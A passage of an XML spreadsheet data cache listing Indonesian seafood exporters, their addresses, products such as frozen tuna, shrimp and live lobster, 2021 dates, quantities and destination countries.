    <s v="China, Hong Kong, Malaysia, Singapore, Sri Lanka, Suriname, Taiwan, Province of China"/>
  </r>
  <r>
    <n v="24143"/>
    <x v="37"/>
    <s v="PT. LAUTAN MUTIARA JAYA"/>
    <s v="Jl. Muara Angke PHPT Blok A No.01-06, Kel. Pluit, Kec. Penjaringan, Kota Jakarta Utara&lt;br&gt;DKI Jakarta"/>
    <n v="12"/>
    <s v="Sirip Hiu Kering"/>
    <d v="2021-03-10T00:00:00"/>
    <n v="25000"/>
    <s v="Kota Jakarta Utara"/>
    <s v="China, Hong Kong, Japan, Malaysia, Singapore, Taiwan, Province of China, Viet Nam"/>
  </r>
  <r>
    <n v="24144"/>
    <x v="37"/>
    <s v="PT. LAUTAN MUTIARA JAYA"/>
    <s v="Jl. Muara Angke PHPT Blok A No.01-06, Kel. Pluit, Kec. Penjaringan, Kota Jakarta Utara&lt;br&gt;DKI Jakarta"/>
    <n v="12"/>
    <s v="Ubur-ubur Asin"/>
    <d v="2021-03-10T00:00:00"/>
    <n v="50000"/>
    <m/>
    <m/>
  </r>
  <r>
    <n v="24145"/>
    <x v="37"/>
    <s v="PT. LAUTAN MUTIARA JAYA"/>
    <s v="Jl. Muara Angke PHPT Blok A No.01-06, Kel. Pluit, Kec. Penjaringan, Kota Jakarta Utara&lt;br&gt;DKI Jakarta"/>
    <n v="12"/>
    <s v="Ikan Demersal Segar (Malong, Lencam, Kerapu, Layur, Beloso, Bawal, Kakap, Kakatua)"/>
    <d v="2021-03-10T00:00:00"/>
    <n v="10000"/>
    <m/>
    <m/>
  </r>
  <r>
    <n v="24147"/>
    <x v="986"/>
    <s v="PT. LINTAS ANTAR NUSA"/>
    <s v="Desa Aeng Batu-Batu, Kec. Galesong Utara, Kabupaten Takalar&lt;br&gt;Sulawesi Selatan"/>
    <n v="26"/>
    <s v="Telur Ikan Terbang Kering"/>
    <d v="2021-04-13T00:00:00"/>
    <n v="99000"/>
    <m/>
    <s v="Australia, China, Hong Kong, Japan, Korea, Republic of, Singapore, Taiwan, Province of China, Thailand, Viet Nam"/>
  </r>
  <r>
    <n v="24148"/>
    <x v="986"/>
    <s v="PT. LINTAS ANTAR NUSA"/>
    <s v="Desa Aeng Batu-Batu, Kec. Galesong Utara, Kabupaten Takalar&lt;br&gt;Sulawesi Selatan"/>
    <n v="26"/>
    <s v="Telur Ikan Terbang Beku"/>
    <d v="2021-04-13T00:00:00"/>
    <n v="60000"/>
    <m/>
    <s v="Australia, China, Hong Kong, Japan, Korea, Republic of, Singapore, Taiwan, Province of China, Thailand, United Arab Emirates, Viet Nam"/>
  </r>
  <r>
    <n v="24149"/>
    <x v="986"/>
    <s v="PT. LINTAS ANTAR NUSA"/>
    <s v="Desa Aeng Batu-Batu, Kec. Galesong Utara, Kabupaten Takalar&lt;br&gt;Sulawesi Selatan"/>
    <n v="26"/>
    <s v="Ikan Demersal Beku (Kerapu, Kakatua, Laccukang, Kakap, Kaci-kaci)"/>
    <d v="2021-04-13T00:00:00"/>
    <n v="0"/>
    <m/>
    <m/>
  </r>
  <r>
    <n v="24150"/>
    <x v="987"/>
    <s v="UD. PUTRI LAUT"/>
    <s v="Jl. Purwosari RT 005 RW 004, Kel. Tambakrejo, Kec. Gayamsari, Kota Semarang&lt;br&gt;Jawa Tengah"/>
    <n v="14"/>
    <s v="Bandeng Duri Lunak"/>
    <d v="2021-03-31T00:00:00"/>
    <n v="1000"/>
    <s v="Kota Semarang"/>
    <m/>
  </r>
  <r>
    <n v="24151"/>
    <x v="987"/>
    <s v="UD. PUTRI LAUT"/>
    <s v="Jl. Purwosari RT 005 RW 004, Kel. Tambakrejo, Kec. Gayamsari, Kota Semarang&lt;br&gt;Jawa Tengah"/>
    <n v="14"/>
    <s v="Krispy Ikan, Krispy Kulit Ikan, Krispy Rumput Laut"/>
    <d v="2021-03-31T00:00:00"/>
    <n v="1000"/>
    <s v="Kota Semarang"/>
    <m/>
  </r>
  <r>
    <n v="24153"/>
    <x v="979"/>
    <s v="PT, USAHA CENTRALJAYA SAKTI"/>
    <s v="Jl, Kima V Kav E No,3A, Kel, Daya, Kec, Biringkannaya, Kota Makassar&lt;br&gt;Sulawesi Selatan"/>
    <n v="26"/>
    <s v="Ikan Pelagis Beku (Tongkol, Terbang, Kembung, Sarden, Selar, Layang, Cakalang, Tenggiri)"/>
    <d v="2021-03-12T00:00:00"/>
    <n v="200000"/>
    <m/>
    <s v="American Samoa, Australia, China, Hong Kong, Japan, Korea, Republic of, Malaysia, Mauritius, Mexico, Singapore, Taiwan, Province of China, Viet Nam"/>
  </r>
  <r>
    <n v="24154"/>
    <x v="986"/>
    <s v="PT. LINTAS ANTAR NUSA"/>
    <s v="Desa Aeng Batu-Batu, Kec. Galesong Utara, Kabupaten Takalar&lt;br&gt;Sulawesi Selatan"/>
    <n v="26"/>
    <s v="Ikan Pelagis Beku (Teri, Baby Tuna, Tongkol, Terbang, Layang, Cakalang)"/>
    <d v="2021-04-13T00:00:00"/>
    <n v="0"/>
    <m/>
    <s v="Australia, China, Hong Kong, Japan, Korea, Republic of, Saudi Arabia, Singapore, Taiwan, Province of China, Thailand, United Arab Emirates, Viet Nam"/>
  </r>
  <r>
    <n v="24155"/>
    <x v="986"/>
    <s v="PT. LINTAS ANTAR NUSA"/>
    <s v="Desa Aeng Batu-Batu, Kec. Galesong Utara, Kabupaten Takalar&lt;br&gt;Sulawesi Selatan"/>
    <n v="26"/>
    <s v="Ikan Pelagis Segar (Teri, Baby Tuna, Tongkol, Terbang, Layang, Cakalang)"/>
    <d v="2021-04-13T00:00:00"/>
    <n v="0"/>
    <m/>
    <s v="Australia, China, Hong Kong, Japan, Korea, Democratic People's Republic of, Saudi Arabia, Singapore, Taiwan, Province of China, Thailand, United Arab Emirates, Viet Nam"/>
  </r>
  <r>
    <n v="24156"/>
    <x v="986"/>
    <s v="PT. LINTAS ANTAR NUSA"/>
    <s v="Desa Aeng Batu-Batu, Kec. Galesong Utara, Kabupaten Takalar&lt;br&gt;Sulawesi Selatan"/>
    <n v="26"/>
    <s v="Ikan Demersal Segar (Kerapu, Kakatua, Laccukang, Kakap, Kaci-kaci)"/>
    <d v="2021-04-13T00:00:00"/>
    <n v="0"/>
    <m/>
    <m/>
  </r>
  <r>
    <n v="24157"/>
    <x v="986"/>
    <s v="PT. LINTAS ANTAR NUSA"/>
    <s v="Desa Aeng Batu-Batu, Kec. Galesong Utara, Kabupaten Takalar&lt;br&gt;Sulawesi Selatan"/>
    <n v="26"/>
    <s v="Cephalopoda Beku (Gurita, Cumi-cumi)"/>
    <d v="2021-04-13T00:00:00"/>
    <n v="0"/>
    <m/>
    <s v="Australia, China, Hong Kong, Japan, Korea, Democratic People's Republic of, Saudi Arabia, Singapore, Thailand, United Arab Emirates, Viet Nam"/>
  </r>
  <r>
    <n v="24158"/>
    <x v="986"/>
    <s v="PT. LINTAS ANTAR NUSA"/>
    <s v="Desa Aeng Batu-Batu, Kec. Galesong Utara, Kabupaten Takalar&lt;br&gt;Sulawesi Selatan"/>
    <n v="26"/>
    <s v="Cephalopoda Segar (Gurita, Cumi-cumi)"/>
    <d v="2021-04-13T00:00:00"/>
    <n v="0"/>
    <m/>
    <s v="Australia, China, Hong Kong, Japan, Korea, Democratic People's Republic of, Saudi Arabia, Singapore, Taiwan, Province of China, Thailand, United Arab Emirates, Viet Nam"/>
  </r>
  <r>
    <n v="24159"/>
    <x v="979"/>
    <s v="PT, USAHA CENTRALJAYA SAKTI"/>
    <s v="Jl, Kima V Kav E No,3A, Kel, Daya, Kec, Biringkannaya, Kota Makassar&lt;br&gt;Sulawesi Selatan"/>
    <n v="26"/>
    <s v="Rumput Laut Kering"/>
    <d v="2021-03-12T00:00:00"/>
    <n v="500000"/>
    <m/>
    <s v="American Samoa, Australia, China, Hong Kong, Japan, Korea, Republic of, Malaysia, Mauritius, Mexico, Singapore, Taiwan, Province of China, Viet Nam"/>
  </r>
  <r>
    <n v="24160"/>
    <x v="979"/>
    <s v="PT, USAHA CENTRALJAYA SAKTI"/>
    <s v="Jl, Kima V Kav E No,3A, Kel, Daya, Kec, Biringkannaya, Kota Makassar&lt;br&gt;Sulawesi Selatan"/>
    <n v="26"/>
    <s v="Udang Kipas Beku"/>
    <d v="2021-03-12T00:00:00"/>
    <n v="100000"/>
    <m/>
    <s v="American Samoa, Australia, China, Hong Kong, Japan, Korea, Republic of, Malaysia, Mauritius, Mexico, Singapore, Taiwan, Province of China, Viet Nam"/>
  </r>
  <r>
    <n v="24167"/>
    <x v="725"/>
    <s v="CV, GIGA SAMUDRA NUSANTARA"/>
    <s v="Jl, Patimura No,09, Kel, Kedungrejo, Kec, Muncar, Kabupaten Banyuwangi&lt;br&gt;Jawa Timur"/>
    <n v="16"/>
    <s v="Ikan Pelagis Beku (Lemuru, Layaran, Layang, Cakalang)"/>
    <d v="2021-04-08T00:00:00"/>
    <n v="1000000"/>
    <s v="Kabupaten Bangka"/>
    <s v="Thailand"/>
  </r>
  <r>
    <n v="24168"/>
    <x v="725"/>
    <s v="CV, GIGA SAMUDRA NUSANTARA"/>
    <s v="Jl, Patimura No,09, Kel, Kedungrejo, Kec, Muncar, Kabupaten Banyuwangi&lt;br&gt;Jawa Timur"/>
    <n v="16"/>
    <s v="Ikan Demersal Beku (Kerapu, Kakap)"/>
    <d v="2021-04-08T00:00:00"/>
    <n v="1000000"/>
    <s v="Kabupaten Bangka"/>
    <s v="Thailand"/>
  </r>
  <r>
    <n v="24169"/>
    <x v="725"/>
    <s v="CV, GIGA SAMUDRA NUSANTARA"/>
    <s v="Jl, Patimura No,09, Kel, Kedungrejo, Kec, Muncar, Kabupaten Banyuwangi&lt;br&gt;Jawa Timur"/>
    <n v="16"/>
    <s v="Tuna Beku"/>
    <d v="2021-04-08T00:00:00"/>
    <n v="1000000"/>
    <s v="Kabupaten Bangka"/>
    <s v="Thailand"/>
  </r>
  <r>
    <n v="24170"/>
    <x v="979"/>
    <s v="PT, USAHA CENTRALJAYA SAKTI"/>
    <s v="Jl, Kima V Kav E No,3A, Kel, Daya, Kec, Biringkannaya, Kota Makassar&lt;br&gt;Sulawesi Selatan"/>
    <n v="26"/>
    <s v="Udang Segar"/>
    <d v="2021-03-12T00:00:00"/>
    <n v="500000"/>
    <m/>
    <s v="American Samoa, Australia, China, Hong Kong, Japan, Korea, Republic of, Malaysia, Mauritius, Mexico, Singapore, Taiwan, Province of China, Viet Nam"/>
  </r>
  <r>
    <n v="24171"/>
    <x v="979"/>
    <s v="PT, USAHA CENTRALJAYA SAKTI"/>
    <s v="Jl, Kima V Kav E No,3A, Kel, Daya, Kec, Biringkannaya, Kota Makassar&lt;br&gt;Sulawesi Selatan"/>
    <n v="26"/>
    <s v="Udang Beku"/>
    <d v="2021-03-12T00:00:00"/>
    <n v="500000"/>
    <m/>
    <s v="American Samoa, Australia, China, Hong Kong, Japan, Korea, Republic of, Malaysia, Mauritius, Mexico, Singapore, Taiwan, Province of China, Viet Nam"/>
  </r>
  <r>
    <n v="24172"/>
    <x v="979"/>
    <s v="PT, USAHA CENTRALJAYA SAKTI"/>
    <s v="Jl, Kima V Kav E No,3A Kel, Daya, Kec, Biringkannaya, Kota Makassar&lt;br&gt;Sulawesi Selatan"/>
    <n v="26"/>
    <s v="Telur Ikan Terbang Kering"/>
    <d v="2021-03-12T00:00:00"/>
    <n v="500000"/>
    <m/>
    <s v="American Samoa, Australia, China, Hong Kong, Japan, Korea, Republic of, Malaysia, Mauritius, Mexico, Singapore, Taiwan, Province of China, Viet Nam"/>
  </r>
  <r>
    <n v="24173"/>
    <x v="988"/>
    <s v="CV. DC JAYA"/>
    <s v="Jl. Melati I No.68 Blok D RT 002 RW 002, Kel. Tanah Tinggi, Kec. Tangerang, Kota Tangerang&lt;br&gt;Banten"/>
    <n v="11"/>
    <s v="Labi-Labi Hidup"/>
    <d v="2021-04-06T00:00:00"/>
    <n v="100"/>
    <m/>
    <s v="China, Philippines, Singapore, Thailand, Viet Nam"/>
  </r>
  <r>
    <n v="24174"/>
    <x v="988"/>
    <s v="CV. DC JAYA"/>
    <s v="Jl. Melati I No.68 Blok D RT 002 RW 002, Kel. Tanah Tinggi, Kec. Tangerang, Kota Tangerang&lt;br&gt;Banten"/>
    <n v="11"/>
    <s v="Kura-kura Hidup"/>
    <d v="2021-04-06T00:00:00"/>
    <n v="100"/>
    <m/>
    <s v="China, Malaysia, Philippines, Singapore, Thailand, Viet Nam"/>
  </r>
  <r>
    <n v="24175"/>
    <x v="988"/>
    <s v="CV. DC JAYA"/>
    <s v="Jl. Melati I No.68 Blok D RT 002 RW 002, Kel. Tanah Tinggi, Kec. Tangerang, Kota Tangerang&lt;br&gt;Banten"/>
    <n v="11"/>
    <s v="Lobster Hidup"/>
    <d v="2021-04-06T00:00:00"/>
    <n v="10000"/>
    <m/>
    <s v="China, Malaysia, Philippines, Singapore, Thailand, Viet Nam"/>
  </r>
  <r>
    <n v="24176"/>
    <x v="988"/>
    <s v="CV. DC JAYA"/>
    <s v="Jl. Melati I No.68 Blok D RT 002 RW 002, Kel. Tanah Tinggi, Kec. Tangerang, Kota Tangerang&lt;br&gt;Banten"/>
    <n v="11"/>
    <s v="Udang Ronggeng Hidup"/>
    <d v="2021-04-06T00:00:00"/>
    <n v="10000"/>
    <m/>
    <s v="China, Malaysia, Philippines, Singapore, Thailand, Viet Nam"/>
  </r>
  <r>
    <n v="24177"/>
    <x v="988"/>
    <s v="CV. DC JAYA"/>
    <s v="Jl. Melati I No.68 Blok D RT 002 RW 002, Kel. Tanah Tinggi, Kec. Tangerang, Kota Tangerang&lt;br&gt;Banten"/>
    <n v="11"/>
    <s v="Keong Laut Hidup"/>
    <d v="2021-04-06T00:00:00"/>
    <n v="10000"/>
    <m/>
    <s v="China, Malaysia, Philippines, Singapore, Thailand, Viet Nam"/>
  </r>
  <r>
    <n v="24178"/>
    <x v="988"/>
    <s v="CV. DC JAYA"/>
    <s v="Jl. Melati I No.68 Blok D RT 002 RW 002, Kel. Tanah Tinggi, Kec. Tangerang, Kota Tangerang&lt;br&gt;Banten"/>
    <n v="11"/>
    <s v="Kerang Hidup"/>
    <d v="2021-04-06T00:00:00"/>
    <n v="10000"/>
    <m/>
    <s v="China, Malaysia, Philippines, Singapore, Thailand, Viet Nam"/>
  </r>
  <r>
    <n v="24179"/>
    <x v="988"/>
    <s v="CV. DC JAYA"/>
    <s v="Jl. Melati I No.68 Blok D RT 002 RW 002, Kel. Tanah Tinggi, Kec. Tangerang, Kota Tangerang&lt;br&gt;Banten"/>
    <n v="11"/>
    <s v="Ikan Demersal Hidup (Kerapu, Kakap, Kurisi)"/>
    <d v="2021-04-06T00:00:00"/>
    <n v="10000"/>
    <m/>
    <s v="China, Malaysia, Philippines, Singapore, Viet Nam"/>
  </r>
  <r>
    <n v="24180"/>
    <x v="988"/>
    <s v="CV. DC JAYA"/>
    <s v="Jl. Melati I No.68 Blok D RT 002 RW 002, Kel. Tanah Tinggi, Kec. Tangerang, Kota Tangerang&lt;br&gt;Banten"/>
    <n v="11"/>
    <s v="Belut Hidup"/>
    <d v="2021-04-06T00:00:00"/>
    <n v="10000"/>
    <m/>
    <s v="China, Malaysia, Philippines, Singapore, Thailand, Viet Nam"/>
  </r>
  <r>
    <n v="24181"/>
    <x v="988"/>
    <s v="CV. DC JAYA"/>
    <s v="Jl. Melati I No.68 Blok D RT 002 RW 002, Kel. Tanah Tinggi, Kec. Tangerang, Kota Tangerang&lt;br&gt;Banten"/>
    <n v="11"/>
    <s v="Kepiting Hidup"/>
    <d v="2021-04-06T00:00:00"/>
    <n v="10000"/>
    <m/>
    <s v="China, Malaysia, Singapore, Thailand, Viet Nam"/>
  </r>
  <r>
    <n v="24182"/>
    <x v="989"/>
    <s v="PT. GERBANG BAHARI SEJAHTERA"/>
    <s v="Jl. Dermaga Pelabuhan Perikanan Muara Angke No.01, Kel. Pluit, Kec. Penjaringan, Kota Jakarta Utara&lt;br&gt;DKI Jakarta"/>
    <n v="12"/>
    <s v="Ikan Pelagis Beku (Lemuru, Tongkol, Deho, Kembung, Lemadang)"/>
    <d v="2021-03-10T00:00:00"/>
    <n v="15000"/>
    <s v="Kota Jakarta Utara"/>
    <s v="China, Japan, Korea, Democratic People's Republic of, Malaysia, Singapore, Sri Lanka, Taiwan, Province of China, Thailand, Viet Nam"/>
  </r>
  <r>
    <n v="24183"/>
    <x v="989"/>
    <s v="PT. GERBANG BAHARI SEJAHTERA"/>
    <s v="Jl. Dermaga Pelabuhan Perikanan Muara Angke No.01, Kel. Pluit, Kec. Penjaringan, Kota Jakarta Utara&lt;br&gt;DKI Jakarta"/>
    <n v="12"/>
    <s v="Ikan Demersal Beku (Kakap Putih, Bawal, Malong, Lencam, Kerapu)"/>
    <d v="2021-03-10T00:00:00"/>
    <n v="15000"/>
    <m/>
    <s v="China, Japan, Korea, Democratic People's Republic of, Malaysia, Singapore, Sri Lanka, Taiwan, Province of China, Thailand, Viet Nam"/>
  </r>
  <r>
    <n v="24184"/>
    <x v="989"/>
    <s v="PT. GERBANG BAHARI SEJAHTERA"/>
    <s v="Jl. Dermaga Pelabuhan Perikanan Muara Angke No.01, Kel. Pluit, Kec. Penjaringan, Kota Jakarta Utara&lt;br&gt;DKI Jakarta"/>
    <n v="12"/>
    <s v="Kepiting Beku"/>
    <d v="2021-03-10T00:00:00"/>
    <n v="10000"/>
    <m/>
    <s v="China, Japan, Korea, Democratic People's Republic of, Malaysia, Singapore, Sri Lanka, Taiwan, Province of China, Thailand, Viet Nam"/>
  </r>
  <r>
    <n v="24185"/>
    <x v="989"/>
    <s v="PT. GERBANG BAHARI SEJAHTERA"/>
    <s v="Jl. Dermaga Pelabuhan Perikanan Muara Angke No.01, Kel. Pluit, Kec. Penjaringan, Kota Jakarta Utara&lt;br&gt;DKI Jakarta"/>
    <n v="12"/>
    <s v="Udang Beku"/>
    <d v="2021-03-10T00:00:00"/>
    <n v="15000"/>
    <m/>
    <s v="China, Japan, Korea, Democratic People's Republic of, Malaysia, Singapore, Sri Lanka, Taiwan, Province of China, Thailand, Viet Nam"/>
  </r>
  <r>
    <n v="24186"/>
    <x v="989"/>
    <s v="PT. GERBANG BAHARI SEJAHTERA"/>
    <s v="Jl. Dermaga Pelabuhan Perikanan Muara Angke No.01, Kel. Pluit, Kec. Penjaringan, Kota Jakarta Utara&lt;br&gt;DKI Jakarta"/>
    <n v="12"/>
    <s v="Cephalopoda Beku (Sotong, Gurita, Cumi-cumi)"/>
    <d v="2021-03-10T00:00:00"/>
    <n v="15000"/>
    <m/>
    <s v="China, Japan, Korea, Democratic People's Republic of, Malaysia, Singapore, Sri Lanka, Taiwan, Province of China, Thailand, Viet Nam"/>
  </r>
  <r>
    <n v="24187"/>
    <x v="989"/>
    <s v="PT. GERBANG BAHARI SEJAHTERA"/>
    <s v="Jl. Dermaga Pelabuhan Perikanan Muara Angke No.01, Kel. Pluit, Kec. Penjaringan, Kota Jakarta Utara&lt;br&gt;DKI Jakarta"/>
    <n v="12"/>
    <s v="Tuna Beku"/>
    <d v="2021-03-10T00:00:00"/>
    <n v="15000"/>
    <m/>
    <s v="China, Japan, Korea, Democratic People's Republic of, Malaysia, Singapore, Sri Lanka, Taiwan, Province of China, Thailand, Viet Nam"/>
  </r>
  <r>
    <n v="24188"/>
    <x v="989"/>
    <s v="PT. GERBANG BAHARI SEJAHTERA"/>
    <s v="Jl. Dermaga Pelabuhan Perikanan Muara Angke No.01, Kel. Pluit, Kec. Penjaringan, Kota Jakarta Utara&lt;br&gt;DKI Jakarta"/>
    <n v="12"/>
    <s v="Hiu Beku"/>
    <d v="2021-03-10T00:00:00"/>
    <n v="10000"/>
    <m/>
    <s v="China, Japan, Korea, Democratic People's Republic of, Malaysia, Singapore, Sri Lanka, Taiwan, Province of China, Thailand, Viet Nam"/>
  </r>
  <r>
    <n v="24189"/>
    <x v="989"/>
    <s v="PT. GERBANG BAHARI SEJAHTERA"/>
    <s v="Jl. Dermaga Pelabuhan Perikanan Muara Angke No.01, Kel. Pluit, Kec. Penjaringan, Kota Jakarta Utara&lt;br&gt;DKI Jakarta"/>
    <n v="12"/>
    <s v="Kerang Beku"/>
    <d v="2021-03-10T00:00:00"/>
    <n v="10000"/>
    <m/>
    <s v="China, Japan, Korea, Democratic People's Republic of, Malaysia, Singapore, Sri Lanka, Taiwan, Province of China, Thailand, Viet Nam"/>
  </r>
  <r>
    <n v="24190"/>
    <x v="989"/>
    <s v="PT. GERBANG BAHARI SEJAHTERA"/>
    <s v="Jl. Dermaga Pelabuhan Perikanan Muara Angke No.01, Kel. Pluit, Kec. Penjaringan, Kota Jakarta Utara&lt;br&gt;DKI Jakarta"/>
    <n v="12"/>
    <s v="Ikan Asin Kering"/>
    <d v="2021-03-10T00:00:00"/>
    <n v="10000"/>
    <m/>
    <s v="China, Japan, Korea, Democratic People's Republic of, Malaysia, Singapore, Taiwan, Province of China, Thailand, Viet Nam"/>
  </r>
  <r>
    <n v="24191"/>
    <x v="989"/>
    <s v="PT. GERBANG BAHARI SEJAHTERA"/>
    <s v="Jl. Dermaga Pelabuhan Perikanan Muara Angke No.01, Kel. Pluit, Kec. Penjaringan, Kota Jakarta Utara&lt;br&gt;DKI Jakarta"/>
    <n v="12"/>
    <s v="Ubur-Ubur Asin"/>
    <d v="2021-03-10T00:00:00"/>
    <n v="5000"/>
    <m/>
    <s v="China, Japan, Korea, Democratic People's Republic of, Malaysia, Singapore, Sri Lanka, Taiwan, Province of China, Thailand, Viet Nam"/>
  </r>
  <r>
    <n v="24192"/>
    <x v="989"/>
    <s v="PT. GERBANG BAHARI SEJAHTERA"/>
    <s v="Jl. Dermaga Pelabuhan Perikanan Muara Angke No.01, Kel. Pluit, Kec. Penjaringan, Kota Jakarta Utara&lt;br&gt;DKI Jakarta"/>
    <n v="12"/>
    <s v="Bandeng Beku"/>
    <d v="2021-03-10T00:00:00"/>
    <n v="10000"/>
    <m/>
    <s v="China, Japan, Korea, Democratic People's Republic of, Malaysia, Singapore, Sri Lanka, Taiwan, Province of China, Thailand, Viet Nam"/>
  </r>
  <r>
    <n v="24193"/>
    <x v="990"/>
    <s v="PT. PAHALA BAHARI NUSANTARA"/>
    <s v="Perum PPSJ Blok O, Kavling 5-6 Room 6, Kel. Penjaringan, Kec. Penjaringan, Kota Jakarta Utara&lt;br&gt;DKI Jakarta"/>
    <n v="12"/>
    <s v="Tuna Beku"/>
    <d v="2021-04-01T00:00:00"/>
    <n v="93600"/>
    <s v="Kota Sibolga, Kota Medan, Kota Surabaya, Kota Denpasar"/>
    <s v="Japan, Philippines, Spain, Thailand, United States, Viet Nam"/>
  </r>
  <r>
    <n v="24194"/>
    <x v="990"/>
    <s v="PT. PAHALA BAHARI NUSANTARA"/>
    <s v="Perum PPSJ Blok O, Kavling 5-6 Room 6, Kel. Penjaringan, Kec. Penjaringan, Kota Jakarta Utara&lt;br&gt;DKI Jakarta"/>
    <n v="12"/>
    <s v="Ikan Pelagis Beku (Baby Tuna, Tongkol, Deho, Kembung, Cakalang, Tenggiri, Salem)"/>
    <d v="2021-04-01T00:00:00"/>
    <n v="950400"/>
    <s v="Kota Sibolga, Kota Medan, Kota Surabaya, Kota Denpasar"/>
    <s v="Japan, Philippines, Spain, Thailand, United States, Viet Nam"/>
  </r>
  <r>
    <n v="24195"/>
    <x v="991"/>
    <s v="PT. SNG SAMUDRA HIJAU"/>
    <s v="Desa Talise, Kec. Likupang Barat, Kabupaten Minahasa Utara&lt;br&gt;Sulawesi Utara"/>
    <n v="29"/>
    <s v="Rumput Laut Kering"/>
    <d v="2021-02-24T00:00:00"/>
    <n v="300000"/>
    <m/>
    <s v="China"/>
  </r>
  <r>
    <n v="24196"/>
    <x v="992"/>
    <s v="PT. BERKAH MUTIARA SELATAN"/>
    <s v="Jl. Lingkar Timur, Kel. Mertasinga, Kec. Cilacap Utara, Kabupaten Cilacap&lt;br&gt;Jawa Tengah"/>
    <n v="14"/>
    <s v="Ubur-Ubur Asin"/>
    <d v="2021-03-08T00:00:00"/>
    <n v="1250"/>
    <m/>
    <s v="China, Malaysia"/>
  </r>
  <r>
    <n v="24197"/>
    <x v="962"/>
    <s v="PT. YFIN INTERNATIONAL"/>
    <s v="Pergudangan Sentra Kosambi Blok G-1/F, Kel. Dadap, Kec. Kosambi, Kabupaten Tangerang&lt;br&gt;Banten"/>
    <n v="11"/>
    <s v="Udang Beku"/>
    <d v="2021-04-01T00:00:00"/>
    <n v="50000"/>
    <m/>
    <s v="China, Japan, Korea, Democratic People's Republic of, Malaysia, Singapore, Taiwan, Province of China, Thailand, Viet Nam"/>
  </r>
  <r>
    <n v="24198"/>
    <x v="962"/>
    <s v="PT. YFIN INTERNATIONAL"/>
    <s v="Pergudangan Sentra Kosambi Blok G-1/F, Kel. Dadap, Kec. Kosambi, Kabupaten Tangerang&lt;br&gt;Banten"/>
    <n v="11"/>
    <s v="Kerang Beku"/>
    <d v="2021-04-01T00:00:00"/>
    <n v="40000"/>
    <m/>
    <s v="China, Japan, Korea, Democratic People's Republic of, Malaysia, Singapore, Taiwan, Province of China, Thailand, Viet Nam"/>
  </r>
  <r>
    <n v="24199"/>
    <x v="962"/>
    <s v="PT. YFIN INTERNATIONAL"/>
    <s v="Pergudangan Sentra Kosambi Blok G-1/F, Kel. Dadap, Kec. Kosambi, Kabupaten Tangerang&lt;br&gt;Banten"/>
    <n v="11"/>
    <s v="Perut Ikan Beku"/>
    <d v="2021-04-01T00:00:00"/>
    <n v="30000"/>
    <m/>
    <s v="China, Hong Kong, Malaysia, Singapore, Taiwan, Province of China, Thailand, Viet Nam"/>
  </r>
  <r>
    <n v="24200"/>
    <x v="993"/>
    <s v="UD. LAUTAN PAPUA INDOTIMUR"/>
    <s v="Jl. Jenderal Sudirman RT 002 RW 007, Kel. Klaligi, Kec. Sorong Manoi, Kota Sorong&lt;br&gt;Papua Barat"/>
    <n v="33"/>
    <s v="Fillet Ikan Beku"/>
    <d v="2021-03-26T00:00:00"/>
    <n v="50000"/>
    <s v="Kota Jakarta Utara"/>
    <s v="China, Hong Kong, Thailand"/>
  </r>
  <r>
    <n v="24201"/>
    <x v="993"/>
    <s v="UD. LAUTAN PAPUA INDOTIMUR"/>
    <s v="Jl. Jenderal Sudirman RT 002 RW 007, Kel. Klaligi, Kec. Sorong Manoi, Kota Sorong&lt;br&gt;Papua Barat"/>
    <n v="33"/>
    <s v="Steak Ikan Beku"/>
    <d v="2021-03-26T00:00:00"/>
    <n v="100000"/>
    <s v="Kota Jakarta Utara, Kota Surabaya"/>
    <s v="China, Hong Kong, Thailand"/>
  </r>
  <r>
    <n v="24202"/>
    <x v="993"/>
    <s v="UD. LAUTAN PAPUA INDOTIMUR"/>
    <s v="Jl. Jenderal Sudirman RT 002 RW 007, Kel. Klaligi, Kec. Sorong Manoi, Kota Sorong&lt;br&gt;Papua Barat"/>
    <n v="33"/>
    <s v="Ikan Pelagis Beku (Deho, Kembung, Cakalang, Tenggiri)"/>
    <d v="2021-03-26T00:00:00"/>
    <n v="50000"/>
    <s v="Kota Jakarta Utara, Kota Surabaya"/>
    <s v="China, Hong Kong, Thailand"/>
  </r>
  <r>
    <n v="24203"/>
    <x v="993"/>
    <s v="UD. LAUTAN PAPUA INDOTIMUR"/>
    <s v="Jl. Jenderal Sudirman RT 002 RW 007, Kel. Klaligi, Kec. Sorong Manoi, Kota Sorong&lt;br&gt;Papua Barat"/>
    <n v="33"/>
    <s v="Tuna Loin Beku"/>
    <d v="2021-03-26T00:00:00"/>
    <n v="50000"/>
    <s v="Kota Jakarta Utara, Kota Surabaya, Kota Makassar"/>
    <s v="China, Hong Kong, Thailand"/>
  </r>
  <r>
    <n v="24204"/>
    <x v="993"/>
    <s v="UD. LAUTAN PAPUA INDOTIMUR"/>
    <s v="Jl. Jenderal Sudirman RT 002 RW 007, Kel. Klaligi, Kec. Sorong Manoi, Kota Sorong&lt;br&gt;Papua Barat"/>
    <n v="33"/>
    <s v="Tuna Beku"/>
    <d v="2021-03-26T00:00:00"/>
    <n v="50000"/>
    <s v="Kota Jakarta Utara, Kota Surabaya, Kota Makassar"/>
    <s v="China, Hong Kong, Thailand"/>
  </r>
  <r>
    <n v="24205"/>
    <x v="993"/>
    <s v="UD. LAUTAN PAPUA INDOTIMUR"/>
    <s v="Jl. Jenderal Sudirman RT 002 RW 007, Kel. Klaligi, Kec. Sorong Manoi, Kota Sorong&lt;br&gt;Papua Barat"/>
    <n v="33"/>
    <s v="Udang Beku"/>
    <d v="2021-03-26T00:00:00"/>
    <n v="100000"/>
    <s v="Kota Jakarta Utara, Kota Surabaya"/>
    <s v="China, Hong Kong, Thailand"/>
  </r>
  <r>
    <n v="24206"/>
    <x v="993"/>
    <s v="UD. LAUTAN PAPUA INDOTIMUR"/>
    <s v="Jl. Jenderal Sudirman RT 002 RW 007, Kel. Klaligi, Kec. Sorong Manoi, Kota Sorong&lt;br&gt;Papua Barat"/>
    <n v="33"/>
    <s v="Ikan Demersal Beku (Kerapu, Kakap)"/>
    <d v="2021-03-26T00:00:00"/>
    <n v="100000"/>
    <s v="Kota Jakarta Utara, Kota Surabaya"/>
    <s v="China, Hong Kong, Thailand"/>
  </r>
  <r>
    <n v="24207"/>
    <x v="993"/>
    <s v="UD. LAUTAN PAPUA INDOTIMUR"/>
    <s v="Jl. Jenderal Sudirman RT 002 RW 007, Kel. Klaligi, Kec. Sorong Manoi, Kota Sorong&lt;br&gt;Papua Barat"/>
    <n v="33"/>
    <s v="Cephalopoda Beku (Sotong, Gurita, Cumi-cumi)"/>
    <d v="2021-03-26T00:00:00"/>
    <n v="50000"/>
    <s v="Kota Jakarta Utara, Kota Surabaya"/>
